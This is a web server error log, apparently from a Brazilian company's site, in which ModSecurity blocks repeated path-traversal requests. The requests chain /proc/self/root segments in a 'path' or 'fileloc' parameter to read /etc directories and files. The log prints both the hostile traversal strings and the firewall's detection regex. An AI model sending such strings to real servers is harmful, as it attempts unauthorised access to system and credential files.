https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:52.022925 2026] [:error] [pid 17965:tid 140411540502272] [client 74.7.241.46:45192] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltlKt8Nd0UC_OcbVG-HAAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:04.779895 2026] [:error] [pid 2160:tid 140411548894976] [client 74.7.241.46:45198] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltoDjrdei6i7MVRTDRdAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:06.197095 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.46:51282] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltogeiSKl8TjouI-YPrgAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:07.376523 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.241.46:51294] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltoweiSKl8TjouI-YPrwAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:10.767996 2026] [:error] [pid 9299:tid 140411641214720] [client 74.7.243.203:60806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltpr-sgTmmJoPuMdysNQAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:12.090626 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:43730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltqAeiSKl8TjouI-YPsAAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:14.438956 2026] [:error] [pid 17965:tid 140411691570944] [client 74.7.243.203:43740] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltqqt8Nd0UC_OcbVG-HgAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:20.518978 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.46:51804] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltsBj0p0SRWAqcjGFuUgAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:31.769266 2026] [:error] [pid 18380:tid 140411624429312] [client 74.7.241.46:40176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltu64xEDsg_V3ESNZAiAAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:33.354929 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.243.203:43744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltvQeiSKl8TjouI-YPzAAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:05:39.103581 2026] [:error] [pid 9299:tid 140411557287680] [client 74.7.243.203:36050] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltw7-sgTmmJoPuMdysPAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:05:41.465287 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.243.203:44278] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltxat8Nd0UC_OcbVG-NQAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:05:42.623495 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.241.46:59236] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltxqBJNF7axNlVR0UKhwAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:46.171286 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.243.203:44290] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltyhj0p0SRWAqcjGFuXQAAAxQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:48.547963 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.243.203:44292] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltzNCmCSWTlPouqorZnAAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:49.817373 2026] [:error] [pid 9299:tid 140411540502272] [client 74.7.243.203:44298] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltzb-sgTmmJoPuMdysPwAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:58.364578 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.243.203:59684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt1qt8Nd0UC_OcbVG-QwAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:05:59.667035 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.243.203:59686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt19CmCSWTlPouqorZnwAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:00.875185 2026] [:error] [pid 9155:tid 140411741927168] [client 74.7.243.203:59480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt2NbI7zhHXcabyMUz4QAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:02.275090 2026] [:error] [pid 9155:tid 140411725141760] [client 74.7.243.203:59490] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt2tbI7zhHXcabyMUz4gAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:06:05.701799 2026] [:error] [pid 9299:tid 140411649607424] [client 74.7.243.203:59500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablt3b-sgTmmJoPuMdysRwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
